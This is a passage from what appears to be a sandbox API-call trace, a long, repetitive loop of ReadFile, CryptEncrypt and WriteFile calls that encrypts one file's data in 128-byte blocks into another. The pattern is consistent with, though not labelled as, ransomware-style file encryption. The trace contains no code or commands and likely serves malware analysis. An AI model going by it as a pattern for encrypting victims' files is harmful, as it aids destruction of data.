nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.909] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.909] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.909] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.909] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.909] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.913] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.913] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.913] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.913] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.913] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.913] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.914] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.914] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.914] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.914] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.920] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.920] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.920] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.920] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.920] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.920] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.920] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.921] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.921] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.922] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.922] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.922] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.922] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.922] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.923] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.923] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.923] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.923] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.923] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.925] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.925] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.925] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.928] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.928] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.928] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, 